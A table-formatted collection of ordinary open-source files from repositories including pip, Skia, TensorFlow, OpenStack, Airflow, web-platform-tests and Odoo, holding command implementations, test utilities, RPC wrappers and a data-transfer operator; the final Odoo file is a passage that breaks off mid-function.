| repo_name | ref | path | copies | content |
|---|---|---|---|---|
jhd/spunout
|
refs/heads/master
|
venv/lib/python2.7/site-packages/pip/commands/help.py
|
401
|
from pip.basecommand import Command, SUCCESS
from pip.exceptions import CommandError
class HelpCommand(Command):
"""Show help for commands"""
name = 'help'
usage = """
%prog <command>"""
summary = 'Show help for commands.'
def run(self, options, args):
from pip.commands import commands, get_similar_commands
try:
# 'pip help' with no args is handled by pip.__init__.parseopt()
cmd_name = args[0] # the command we need help for
except IndexError:
return SUCCESS
if cmd_name not in commands:
guess = get_similar_commands(cmd_name)
msg = ['unknown command "%s"' % cmd_name]
if guess:
msg.append('maybe you meant "%s"' % guess)
raise CommandError(' - '.join(msg))
command = commands[cmd_name]()
command.parser.print_help()
return SUCCESS
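# A hedged usage sketch (not part of the original module): this class backs
# the `pip help` CLI entry point, so e.g. `pip help freeze` would print the
# freeze command's option parser help, while a misspelled name such as
# `pip help frezee` would raise CommandError, suggesting "freeze" if
# get_similar_commands finds a close match.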
|
AOSPA-L/android_external_skia
|
refs/heads/lollipop-mr1
|
gm/rebaseline_server/compare_rendered_pictures.py
|
66
|
#!/usr/bin/python
"""
Copyright 2014 Google Inc.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
Compare results of two render_pictures runs.
"""
# System-level imports
import logging
import os
import re
import time
# Imports from within Skia
import fix_pythonpath # must do this first
from pyutils import url_utils
import gm_json
import imagediffdb
import imagepair
import imagepairset
import results
# URL under which all render_pictures images can be found in Google Storage.
# TODO(epoger): Move this default value into
# https://skia.googlesource.com/buildbot/+/master/site_config/global_variables.json
DEFAULT_IMAGE_BASE_URL = 'http://chromium-skia-gm.commondatastorage.googleapis.com/render_pictures/images'
class RenderedPicturesComparisons(results.BaseComparisons):
"""Loads results from two different render_pictures runs into an ImagePairSet.
"""
def __init__(self, subdirs, actuals_root,
generated_images_root=results.DEFAULT_GENERATED_IMAGES_ROOT,
image_base_url=DEFAULT_IMAGE_BASE_URL,
diff_base_url=None):
"""
Args:
actuals_root: root directory containing all render_pictures-generated
JSON files
subdirs: (string, string) tuple; pair of subdirectories within
actuals_root to compare
generated_images_root: directory within which to create all pixel diffs;
if this directory does not yet exist, it will be created
image_base_url: URL under which all render_pictures result images can
be found; this will be used to read images for comparison within
this code, and included in the ImagePairSet so its consumers know
where to download the images from
diff_base_url: base URL within which the client should look for diff
images; if not specified, defaults to a "file:///" URL representation
of generated_images_root
"""
time_start = int(time.time())
self._image_diff_db = imagediffdb.ImageDiffDB(generated_images_root)
self._image_base_url = image_base_url
self._diff_base_url = (
diff_base_url or
url_utils.create_filepath_url(generated_images_root))
self._load_result_pairs(actuals_root, subdirs)
self._timestamp = int(time.time())
logging.info('Results complete; took %d seconds.' %
(self._timestamp - time_start))
def _load_result_pairs(self, actuals_root, subdirs):
"""Loads all JSON files found within two subdirs in actuals_root,
compares across those two subdirs, and stores the summary in self._results.
Args:
actuals_root: root directory containing all render_pictures-generated
JSON files
subdirs: (string, string) tuple; pair of subdirectories within
actuals_root to compare
"""
logging.info(
'Reading actual-results JSON files from %s subdirs within %s...' % (
subdirs, actuals_root))
subdirA, subdirB = subdirs
subdirA_dicts = self._read_dicts_from_root(
os.path.join(actuals_root, subdirA))
subdirB_dicts = self._read_dicts_from_root(
os.path.join(actuals_root, subdirB))
logging.info('Comparing subdirs %s and %s...' % (subdirA, subdirB))
all_image_pairs = imagepairset.ImagePairSet(
descriptions=subdirs,
diff_base_url=self._diff_base_url)
failing_image_pairs = imagepairset.ImagePairSet(
descriptions=subdirs,
diff_base_url=self._diff_base_url)
all_image_pairs.ensure_extra_column_values_in_summary(
column_id=results.KEY__EXTRACOLUMNS__RESULT_TYPE, values=[
results.KEY__RESULT_TYPE__FAILED,
results.KEY__RESULT_TYPE__NOCOMPARISON,
results.KEY__RESULT_TYPE__SUCCEEDED,
])
failing_image_pairs.ensure_extra_column_values_in_summary(
column_id=results.KEY__EXTRACOLUMNS__RESULT_TYPE, values=[
results.KEY__RESULT_TYPE__FAILED,
results.KEY__RESULT_TYPE__NOCOMPARISON,
])
common_dict_paths = sorted(set(subdirA_dicts.keys() + subdirB_dicts.keys()))
num_common_dict_paths = len(common_dict_paths)
dict_num = 0
for dict_path in common_dict_paths:
dict_num += 1
logging.info('Generating pixel diffs for dict #%d of %d, "%s"...' %
(dict_num, num_common_dict_paths, dict_path))
dictA = subdirA_dicts[dict_path]
dictB = subdirB_dicts[dict_path]
self._validate_dict_version(dictA)
self._validate_dict_version(dictB)
dictA_results = dictA[gm_json.JSONKEY_ACTUALRESULTS]
dictB_results = dictB[gm_json.JSONKEY_ACTUALRESULTS]
skp_names = sorted(set(dictA_results.keys() + dictB_results.keys()))
for skp_name in skp_names:
imagepairs_for_this_skp = []
whole_image_A = RenderedPicturesComparisons.get_multilevel(
dictA_results, skp_name, gm_json.JSONKEY_SOURCE_WHOLEIMAGE)
whole_image_B = RenderedPicturesComparisons.get_multilevel(
dictB_results, skp_name, gm_json.JSONKEY_SOURCE_WHOLEIMAGE)
imagepairs_for_this_skp.append(self._create_image_pair(
test=skp_name, config=gm_json.JSONKEY_SOURCE_WHOLEIMAGE,
image_dict_A=whole_image_A, image_dict_B=whole_image_B))
tiled_images_A = RenderedPicturesComparisons.get_multilevel(
dictA_results, skp_name, gm_json.JSONKEY_SOURCE_TILEDIMAGES)
tiled_images_B = RenderedPicturesComparisons.get_multilevel(
dictB_results, skp_name, gm_json.JSONKEY_SOURCE_TILEDIMAGES)
# TODO(epoger): Report an error if we find tiles for A but not B?
if tiled_images_A and tiled_images_B:
# TODO(epoger): Report an error if we find a different number of tiles
# for A and B?
num_tiles = len(tiled_images_A)
for tile_num in range(num_tiles):
imagepairs_for_this_skp.append(self._create_image_pair(
test=skp_name,
config='%s-%d' % (gm_json.JSONKEY_SOURCE_TILEDIMAGES, tile_num),
image_dict_A=tiled_images_A[tile_num],
image_dict_B=tiled_images_B[tile_num]))
for imagepair in imagepairs_for_this_skp:
if imagepair:
all_image_pairs.add_image_pair(imagepair)
result_type = imagepair.extra_columns_dict\
[results.KEY__EXTRACOLUMNS__RESULT_TYPE]
if result_type != results.KEY__RESULT_TYPE__SUCCEEDED:
failing_image_pairs.add_image_pair(imagepair)
self._results = {
results.KEY__HEADER__RESULTS_ALL: all_image_pairs.as_dict(),
results.KEY__HEADER__RESULTS_FAILURES: failing_image_pairs.as_dict(),
}
def _validate_dict_version(self, result_dict):
"""Raises Exception if the dict is not the type/version we know how to read.
Args:
result_dict: dictionary holding output of render_pictures
"""
expected_header_type = 'ChecksummedImages'
expected_header_revision = 1
header = result_dict[gm_json.JSONKEY_HEADER]
header_type = header[gm_json.JSONKEY_HEADER_TYPE]
if header_type != expected_header_type:
raise Exception('expected header_type "%s", but got "%s"' % (
expected_header_type, header_type))
header_revision = header[gm_json.JSONKEY_HEADER_REVISION]
if header_revision != expected_header_revision:
raise Exception('expected header_revision %d, but got %d' % (
expected_header_revision, header_revision))
def _create_image_pair(self, test, config, image_dict_A, image_dict_B):
"""Creates an ImagePair object for this pair of images.
Args:
test: string; name of the test
config: string; name of the config
image_dict_A: dict with JSONKEY_IMAGE_* keys, or None if no image
image_dict_B: dict with JSONKEY_IMAGE_* keys, or None if no image
Returns:
An ImagePair object, or None if both image_dict_A and image_dict_B are
None.
"""
if (not image_dict_A) and (not image_dict_B):
return None
def _checksum_and_relative_url(dic):
if dic:
return ((dic[gm_json.JSONKEY_IMAGE_CHECKSUMALGORITHM],
dic[gm_json.JSONKEY_IMAGE_CHECKSUMVALUE]),
dic[gm_json.JSONKEY_IMAGE_FILEPATH])
else:
return None, None
imageA_checksum, imageA_relative_url = _checksum_and_relative_url(
image_dict_A)
imageB_checksum, imageB_relative_url = _checksum_and_relative_url(
image_dict_B)
if not imageA_checksum:
result_type = results.KEY__RESULT_TYPE__NOCOMPARISON
elif not imageB_checksum:
result_type = results.KEY__RESULT_TYPE__NOCOMPARISON
elif imageA_checksum == imageB_checksum:
result_type = results.KEY__RESULT_TYPE__SUCCEEDED
else:
result_type = results.KEY__RESULT_TYPE__FAILED
extra_columns_dict = {
results.KEY__EXTRACOLUMNS__CONFIG: config,
results.KEY__EXTRACOLUMNS__RESULT_TYPE: result_type,
results.KEY__EXTRACOLUMNS__TEST: test,
# TODO(epoger): Right now, the client UI crashes if it receives
# results that do not include this column.
# Until we fix that, keep the client happy.
results.KEY__EXTRACOLUMNS__BUILDER: 'TODO',
}
try:
return imagepair.ImagePair(
image_diff_db=self._image_diff_db,
base_url=self._image_base_url,
imageA_relative_url=imageA_relative_url,
imageB_relative_url=imageB_relative_url,
extra_columns=extra_columns_dict)
except (KeyError, TypeError):
logging.exception(
'got exception while creating ImagePair for'
' test="%s", config="%s", urlPair=("%s","%s")' % (
test, config, imageA_relative_url, imageB_relative_url))
return None
# TODO(epoger): Add main() so this can be called by vm_run_skia_try.sh
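# A hedged instantiation sketch (paths and subdir names are hypothetical,
# not from the original file):
# comparisons = RenderedPicturesComparisons(
#     subdirs=('before-patch', 'after-patch'),
#     actuals_root='/tmp/render_pictures/actuals')
# After __init__ returns, self._results holds the KEY__HEADER__RESULTS_ALL
# and KEY__HEADER__RESULTS_FAILURES dictionaries built by _load_result_pairs.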
|
dmoliveira/networkx
|
refs/heads/master
|
examples/pygraphviz/pygraphviz_draw.py
|
27
|
#!/usr/bin/env python
"""
An example showing how to use the interface to the pygraphviz
AGraph class to draw a graph.
Also see the pygraphviz documentation and examples at
http://pygraphviz.github.io/
"""
__author__ = """Aric Hagberg (hagberg@lanl.gov)"""
# Copyright (C) 2006 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
from networkx import *
# plain graph
G=complete_graph(5) # start with K5 in networkx
A=to_agraph(G) # convert to a graphviz graph
A.layout() # neato layout
A.draw("k5.ps") # write postscript in k5.ps with neato layout
|
horance-liu/tensorflow
|
refs/heads/master
|
tensorflow/tools/test/system_info_lib.py
|
101
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Library for getting system information during TensorFlow tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import multiprocessing
import platform
import re
import socket
# pylint: disable=g-bad-import-order
# Note: cpuinfo and psutil are not installed for you in the TensorFlow
# OSS tree. They are installable via pip.
import cpuinfo
import psutil
# pylint: enable=g-bad-import-order
from tensorflow.core.util import test_log_pb2
from tensorflow.python.client import device_lib
from tensorflow.python.framework import errors
from tensorflow.python.platform import gfile
from tensorflow.tools.test import gpu_info_lib
def gather_machine_configuration():
"""Gather Machine Configuration. This is the top level fn of this library."""
config = test_log_pb2.MachineConfiguration()
config.cpu_info.CopyFrom(gather_cpu_info())
config.platform_info.CopyFrom(gather_platform_info())
# gather_available_device_info must come before gather_gpu_devices
# because the latter may access libcudart directly, which confuses
# TensorFlow StreamExecutor.
for d in gather_available_device_info():
config.available_device_info.add().CopyFrom(d)
for gpu in gpu_info_lib.gather_gpu_devices():
config.device_info.add().Pack(gpu)
config.memory_info.CopyFrom(gather_memory_info())
config.hostname = gather_hostname()
return config
def gather_hostname():
return socket.gethostname()
def gather_memory_info():
"""Gather memory info."""
mem_info = test_log_pb2.MemoryInfo()
vmem = psutil.virtual_memory()
mem_info.total = vmem.total
mem_info.available = vmem.available
return mem_info
def gather_cpu_info():
"""Gather CPU Information. Assumes all CPUs are the same."""
cpu_info = test_log_pb2.CPUInfo()
cpu_info.num_cores = multiprocessing.cpu_count()
# Gather num_cores_allowed
try:
with gfile.GFile('/proc/self/status', 'rb') as fh:
nc = re.search(r'(?m)^Cpus_allowed:\s*(.*)$', fh.read())
if nc: # e.g. 'ff' => 8, 'fff' => 12
cpu_info.num_cores_allowed = (
bin(int(nc.group(1).replace(',', ''), 16)).count('1'))
except errors.OpError:
pass
finally:
if cpu_info.num_cores_allowed == 0:
cpu_info.num_cores_allowed = cpu_info.num_cores
# Gather the rest
info = cpuinfo.get_cpu_info()
cpu_info.cpu_info = info['brand']
cpu_info.num_cores = info['count']
cpu_info.mhz_per_cpu = info['hz_advertised_raw'][0] / 1.0e6
l2_cache_size = re.match(r'(\d+)', str(info.get('l2_cache_size', '')))
if l2_cache_size:
# If a value is returned, it's in KB
cpu_info.cache_size['L2'] = int(l2_cache_size.group(0)) * 1024
# Try to get the CPU governor
try:
cpu_governors = set([
gfile.GFile(f, 'r').readline().rstrip()
for f in glob.glob(
'/sys/devices/system/cpu/cpu*/cpufreq/scaling_governor')
])
if cpu_governors:
if len(cpu_governors) > 1:
cpu_info.cpu_governor = 'mixed'
else:
cpu_info.cpu_governor = list(cpu_governors)[0]
except errors.OpError:
pass
return cpu_info
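# A worked example of the Cpus_allowed parsing above (pure arithmetic): each
# hex digit of the mask contributes its set bits, so
# bin(int('ff', 16)).count('1') == 8 and bin(int('fff', 16)).count('1') == 12,
# matching the "'ff' => 8, 'fff' => 12" comment.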
def gather_available_device_info():
"""Gather list of devices available to TensorFlow.
Returns:
A list of test_log_pb2.AvailableDeviceInfo messages.
"""
device_info_list = []
devices = device_lib.list_local_devices()
for d in devices:
device_info = test_log_pb2.AvailableDeviceInfo()
device_info.name = d.name
device_info.type = d.device_type
device_info.memory_limit = d.memory_limit
device_info.physical_description = d.physical_device_desc
device_info_list.append(device_info)
return device_info_list
def gather_platform_info():
"""Gather platform info."""
platform_info = test_log_pb2.PlatformInfo()
(platform_info.bits, platform_info.linkage) = platform.architecture()
platform_info.machine = platform.machine()
platform_info.release = platform.release()
platform_info.system = platform.system()
platform_info.version = platform.version()
return platform_info
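if __name__ == '__main__':
  # A minimal manual smoke-test sketch, not part of the original module:
  # assumes cpuinfo and psutil are installed and that device_lib can
  # enumerate local devices on this machine.
  print(gather_machine_configuration())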
|
evernym/plenum
|
refs/heads/master
|
plenum/test/primary_selection/test_add_node_with_f_changed.py
|
2
|
import pytest
from stp_core.common.log import getlogger
from plenum.test.node_catchup.helper import waitNodeDataEquality
from plenum.common.util import randomString
from plenum.test.test_node import checkNodesConnected
from plenum.test.pool_transactions.helper import sdk_add_new_steward_and_node
from plenum.test import waits
logger = getlogger()
@pytest.fixture(scope="function", autouse=True)
def limitTestRunningTime():
return 150
def add_new_node(looper, nodes, sdk_pool_handle, sdk_wallet_steward,
tdir, tconf, all_plugins_path, name=None):
node_name = name or randomString(5)
new_steward_name = "testClientSteward" + randomString(3)
new_steward_wallet_handle, new_node = \
sdk_add_new_steward_and_node(looper,
sdk_pool_handle,
sdk_wallet_steward,
new_steward_name,
node_name,
tdir,
tconf,
all_plugins_path)
nodes.append(new_node)
looper.run(checkNodesConnected(nodes, customTimeout=60))
timeout = waits.expectedPoolCatchupTime(nodeCount=len(nodes))
waitNodeDataEquality(looper, new_node, *nodes[:-1],
customTimeout=timeout, exclude_from_check=['check_last_ordered_3pc_backup'])
return new_node
def test_add_node_with_f_changed(looper, txnPoolNodeSet, tdir, tconf,
allPluginsPath, sdk_pool_handle,
sdk_wallet_steward, limitTestRunningTime):
nodes = txnPoolNodeSet
add_new_node(looper,
nodes,
sdk_pool_handle,
sdk_wallet_steward,
tdir,
tconf,
allPluginsPath,
name="Node5")
add_new_node(looper,
nodes,
sdk_pool_handle,
sdk_wallet_steward,
tdir,
tconf,
allPluginsPath,
name="Node6")
add_new_node(looper,
nodes,
sdk_pool_handle,
sdk_wallet_steward,
tdir,
tconf,
allPluginsPath,
name="Node7")
add_new_node(looper,
nodes,
sdk_pool_handle,
sdk_wallet_steward,
tdir,
tconf,
allPluginsPath,
name="Node8")
# check that all nodes have an equal number of replicas
assert len(set([n.replicas.num_replicas for n in txnPoolNodeSet])) == 1
assert txnPoolNodeSet[-1].replicas.num_replicas == txnPoolNodeSet[-1].requiredNumberOfInstances
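# A worked sanity check for the assertions above, assuming the usual RBFT
# sizing where f = (N - 1) // 3 and requiredNumberOfInstances = f + 1: the
# pool grows from 4 nodes (f=1, 2 replicas each) to 8 nodes (f=2), so every
# node should end up running (8 - 1) // 3 + 1 == 3 replicas.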
|
xchenum/quantum
|
refs/heads/master
|
quantum/openstack/common/rpc/__init__.py
|
3
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright 2011 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A remote procedure call (rpc) abstraction.
For some wrappers that add message versioning to rpc, see:
rpc.dispatcher
rpc.proxy
"""
from quantum.openstack.common import cfg
from quantum.openstack.common import importutils
rpc_opts = [
cfg.StrOpt('rpc_backend',
default='%s.impl_kombu' % __package__,
help="The messaging module to use, defaults to kombu."),
cfg.IntOpt('rpc_thread_pool_size',
default=64,
help='Size of RPC thread pool'),
cfg.IntOpt('rpc_conn_pool_size',
default=30,
help='Size of RPC connection pool'),
cfg.IntOpt('rpc_response_timeout',
default=60,
help='Seconds to wait for a response from call or multicall'),
cfg.IntOpt('rpc_cast_timeout',
default=30,
help='Seconds to wait before a cast expires (TTL). '
'Only supported by impl_zmq.'),
cfg.ListOpt('allowed_rpc_exception_modules',
default=['quantum.openstack.common.exception',
'nova.exception',
],
help='Modules of exceptions that are permitted to be recreated '
'upon receiving exception data from an rpc call.'),
cfg.StrOpt('control_exchange',
default='nova',
help='AMQP exchange to connect to if using RabbitMQ or Qpid'),
cfg.BoolOpt('fake_rabbit',
default=False,
help='If passed, use a fake RabbitMQ provider'),
]
cfg.CONF.register_opts(rpc_opts)
def create_connection(new=True):
"""Create a connection to the message bus used for rpc.
For some example usage of creating a connection and some consumers on that
connection, see nova.service.
:param new: Whether or not to create a new connection. A new connection
will be created by default. If new is False, the
implementation is free to return an existing connection from a
pool.
:returns: An instance of openstack.common.rpc.common.Connection
"""
return _get_impl().create_connection(cfg.CONF, new=new)
def call(context, topic, msg, timeout=None):
"""Invoke a remote method that returns something.
:param context: Information that identifies the user that has made this
request.
:param topic: The topic to send the rpc message to. This correlates to the
topic argument of
openstack.common.rpc.common.Connection.create_consumer()
and only applies when the consumer was created with
fanout=False.
:param msg: This is a dict in the form { "method" : "method_to_invoke",
"args" : dict_of_kwargs }
:param timeout: int, number of seconds to use for a response timeout.
If set, this overrides the rpc_response_timeout option.
:returns: A dict from the remote method.
:raises: openstack.common.rpc.common.Timeout if a complete response
is not received before the timeout is reached.
"""
return _get_impl().call(cfg.CONF, context, topic, msg, timeout)
def cast(context, topic, msg):
"""Invoke a remote method that does not return anything.
:param context: Information that identifies the user that has made this
request.
:param topic: The topic to send the rpc message to. This correlates to the
topic argument of
openstack.common.rpc.common.Connection.create_consumer()
and only applies when the consumer was created with
fanout=False.
:param msg: This is a dict in the form { "method" : "method_to_invoke",
"args" : dict_of_kwargs }
:returns: None
"""
return _get_impl().cast(cfg.CONF, context, topic, msg)
def fanout_cast(context, topic, msg):
"""Broadcast a remote method invocation with no return.
This method will get invoked on all consumers that were set up with this
topic name and fanout=True.
:param context: Information that identifies the user that has made this
request.
:param topic: The topic to send the rpc message to. This correlates to the
topic argument of
openstack.common.rpc.common.Connection.create_consumer()
and only applies when the consumer was created with
fanout=True.
:param msg: This is a dict in the form { "method" : "method_to_invoke",
"args" : dict_of_kwargs }
:returns: None
"""
return _get_impl().fanout_cast(cfg.CONF, context, topic, msg)
def multicall(context, topic, msg, timeout=None):
"""Invoke a remote method and get back an iterator.
In this case, the remote method will be returning multiple values in
separate messages, so the return values can be processed as they come in via
an iterator.
:param context: Information that identifies the user that has made this
request.
:param topic: The topic to send the rpc message to. This correlates to the
topic argument of
openstack.common.rpc.common.Connection.create_consumer()
and only applies when the consumer was created with
fanout=False.
:param msg: This is a dict in the form { "method" : "method_to_invoke",
"args" : dict_of_kwargs }
:param timeout: int, number of seconds to use for a response timeout.
If set, this overrides the rpc_response_timeout option.
:returns: An iterator. The iterator will yield a tuple (N, X) where N is
an index that starts at 0 and increases by one for each value
returned and X is the Nth value that was returned by the remote
method.
:raises: openstack.common.rpc.common.Timeout if a complete response
is not received before the timeout is reached.
"""
return _get_impl().multicall(cfg.CONF, context, topic, msg, timeout)
def notify(context, topic, msg):
"""Send notification event.
:param context: Information that identifies the user that has made this
request.
:param topic: The topic to send the notification to.
:param msg: This is a dict of content of event.
:returns: None
"""
return _get_impl().notify(cfg.CONF, context, topic, msg)
def cleanup():
"""Clean up resoruces in use by implementation.
Clean up any resources that have been allocated by the RPC implementation.
This is typically open connections to a messaging service. This function
would get called before an application using this API exits to allow
connections to get torn down cleanly.
:returns: None
"""
return _get_impl().cleanup()
def cast_to_server(context, server_params, topic, msg):
"""Invoke a remote method that does not return anything.
:param context: Information that identifies the user that has made this
request.
:param server_params: Connection information
:param topic: The topic to send the notification to.
:param msg: This is a dict in the form { "method" : "method_to_invoke",
"args" : dict_of_kwargs }
:returns: None
"""
return _get_impl().cast_to_server(cfg.CONF, context, server_params, topic,
msg)
def fanout_cast_to_server(context, server_params, topic, msg):
"""Broadcast to a remote method invocation with no return.
:param context: Information that identifies the user that has made this
request.
:param server_params: Connection information
:param topic: The topic to send the notification to.
:param msg: This is a dict in the form { "method" : "method_to_invoke",
"args" : dict_of_kwargs }
:returns: None
"""
return _get_impl().fanout_cast_to_server(cfg.CONF, context, server_params,
topic, msg)
def queue_get_for(context, topic, host):
"""Get a queue name for a given topic + host.
This function only works if this naming convention is followed on the
consumer side, as well. For example, in nova, every instance of the
nova-foo service calls create_consumer() for two topics:
foo
foo.<host>
Messages sent to the 'foo' topic are distributed to exactly one instance of
the nova-foo service. The services are chosen in a round-robin fashion.
Messages sent to the 'foo.<host>' topic are sent to the nova-foo service on
<host>.
"""
return '%s.%s' % (topic, host)
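# For example, queue_get_for(context, 'foo', 'host1') returns 'foo.host1',
# addressing the nova-foo service running on host1.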
_RPCIMPL = None
def _get_impl():
"""Delay import of rpc_backend until configuration is loaded."""
global _RPCIMPL
if _RPCIMPL is None:
try:
_RPCIMPL = importutils.import_module(cfg.CONF.rpc_backend)
except ImportError:
# For backwards compatibility with older nova config.
impl = cfg.CONF.rpc_backend.replace('nova.rpc',
'nova.openstack.common.rpc')
_RPCIMPL = importutils.import_module(impl)
return _RPCIMPL
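# A worked example of the backwards-compatibility fallback above: a legacy
# setting of rpc_backend = 'nova.rpc.impl_kombu' fails to import, gets
# rewritten to 'nova.openstack.common.rpc.impl_kombu', and that module is
# imported instead.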
|
vitiral/micropython
|
refs/heads/master
|
tests/basics/class_contains.py
|
117
|
# A contains everything
class A:
def __contains__(self, key):
return True
a = A()
print(True in a)
print(1 in a)
print(() in a)
# B contains given things
class B:
def __init__(self, items):
self.items = items
def __contains__(self, key):
return key in self.items
b = B([])
print(1 in b)
b = B([1, 2])
print(1 in b)
print(2 in b)
print(3 in b)
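# Expected output of the checks above: A contains everything, so the first
# three prints are True; then False (empty B), True, True, False:
# True
# True
# True
# False
# True
# True
# False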
|
teosz/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/fetch/api/resources/method.py
|
161
|
def main(request, response):
headers = []
if "cors" in request.GET:
headers.append(("Access-Control-Allow-Origin", "*"))
headers.append(("Access-Control-Allow-Credentials", "true"))
headers.append(("Access-Control-Allow-Methods", "GET, POST, PUT, FOO"))
headers.append(("Access-Control-Allow-Headers", "x-test, x-foo"))
headers.append(("Access-Control-Expose-Headers", "x-request-method"))
headers.append(("x-request-method", request.method))
return headers, request.body
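# A hedged client-side sketch (the URL is hypothetical and `requests` is
# not part of the wptserve harness): an arbitrary-method cross-origin
# request should be allowed and the method echoed back.
# import requests
# r = requests.request('FOO', 'http://example.test/fetch/api/resources/method.py?cors')
# assert r.headers['x-request-method'] == 'FOO'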
|
cppisfun/GameEngine
|
refs/heads/master
|
foreign/boost/tools/build/v2/example/python_modules/python_helpers.py
|
12
|
# Copyright 2006 Vladimir Prus
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
# Declare a couple of functions called from Boost.Build
#
# Each function will receive as many arguments as there are ":"-separated
# arguments in the bjam call. Each argument is a list of strings.
# As a special exception (aka bug), if no arguments are passed in bjam,
# the Python function will be passed a single empty list.
#
# All Python functions must return a list of strings, which may be empty.
def test1(l):
return ["foo", "bar"]
def test2(l, l2):
return [l[0], l2[0]]
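# For example, bjam calling test2 with "a : b" passes two single-element
# lists, so test2(["a"], ["b"]) returns ["a", "b"], while test1 returns
# ["foo", "bar"] regardless of its input.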
|
sekikn/incubator-airflow
|
refs/heads/master
|
airflow/operators/generic_transfer.py
|
5
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import List, Optional, Union
from airflow.hooks.base import BaseHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class GenericTransfer(BaseOperator):
"""
Moves data from a connection to another, assuming that they both
provide the required methods in their respective hooks. The source hook
needs to expose a `get_records` method, and the destination an
`insert_rows` method.
This is meant to be used on small-ish datasets that fit in memory.
:param sql: SQL query to execute against the source database. (templated)
:type sql: str
:param destination_table: target table. (templated)
:type destination_table: str
:param source_conn_id: source connection
:type source_conn_id: str
:param destination_conn_id: destination connection
:type destination_conn_id: str
:param preoperator: sql statement or list of statements to be
executed prior to loading the data. (templated)
:type preoperator: str or list[str]
"""
template_fields = ('sql', 'destination_table', 'preoperator')
template_ext = (
'.sql',
'.hql',
)
ui_color = '#b0f07c'
@apply_defaults
def __init__(
self,
*,
sql: str,
destination_table: str,
source_conn_id: str,
destination_conn_id: str,
preoperator: Optional[Union[str, List[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.sql = sql
self.destination_table = destination_table
self.source_conn_id = source_conn_id
self.destination_conn_id = destination_conn_id
self.preoperator = preoperator
def execute(self, context):
source_hook = BaseHook.get_hook(self.source_conn_id)
self.log.info("Extracting data from %s", self.source_conn_id)
self.log.info("Executing: \n %s", self.sql)
results = source_hook.get_records(self.sql)
destination_hook = BaseHook.get_hook(self.destination_conn_id)
if self.preoperator:
self.log.info("Running preoperator")
self.log.info(self.preoperator)
destination_hook.run(self.preoperator)
self.log.info("Inserting rows into %s", self.destination_conn_id)
destination_hook.insert_rows(table=self.destination_table, rows=results)
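# A hedged usage sketch (connection ids, table names, and the task_id are
# hypothetical, not from the original file):
# transfer = GenericTransfer(
#     task_id='mysql_to_postgres',
#     sql='SELECT * FROM source_table',
#     destination_table='dest_table',
#     source_conn_id='mysql_default',
#     destination_conn_id='postgres_default',
#     preoperator='TRUNCATE TABLE dest_table',
#     dag=dag,
# )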
|
rruebner/odoo
|
refs/heads/master
|
addons/account/wizard/account_reconcile_partner_process.py
|
385
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class account_partner_reconcile_process(osv.osv_memory):
_name = 'account.partner.reconcile.process'
_description = 'Reconciliation Process partner by partner'
def _get_to_reconcile(self, cr, uid, context=None):
cr.execute("""
SELECT p_id FROM (SELECT l.partner_id as p_id, SUM(l.debit) AS debit, SUM(l.credit) AS credit
FROM account_move_line AS l LEFT JOIN account_account a ON (l.account_id = a.id)
LEFT JOIN res_partner p ON (p.id = l.partner_id)
WHERE a.reconcile = 't'
AND l.reconcile_id IS NULL
AND (%s > to_char(p.last_reconciliation_date, 'YYYY-MM-DD') OR p.last_reconciliation_date IS NULL )
AND l.state <> 'draft'
GROUP BY l.partner_id) AS tmp
WHERE debit > 0
AND credit > 0
""",(time.strftime('%Y-%m-%d'),)
)
return len(map(lambda x: x[0], cr.fetchall())) - 1
def _get_today_reconciled(self, cr, uid, context=None):
cr.execute(
"SELECT l.partner_id " \
"FROM account_move_line AS l LEFT JOIN res_partner p ON (p.id = l.partner_id) " \
"WHERE l.reconcile_id IS NULL " \
"AND %s = to_char(p.last_reconciliation_date, 'YYYY-MM-DD') " \
"AND l.state <> 'draft' " \
"GROUP BY l.partner_id ",(time.strftime('%Y-%m-%d'),)
)
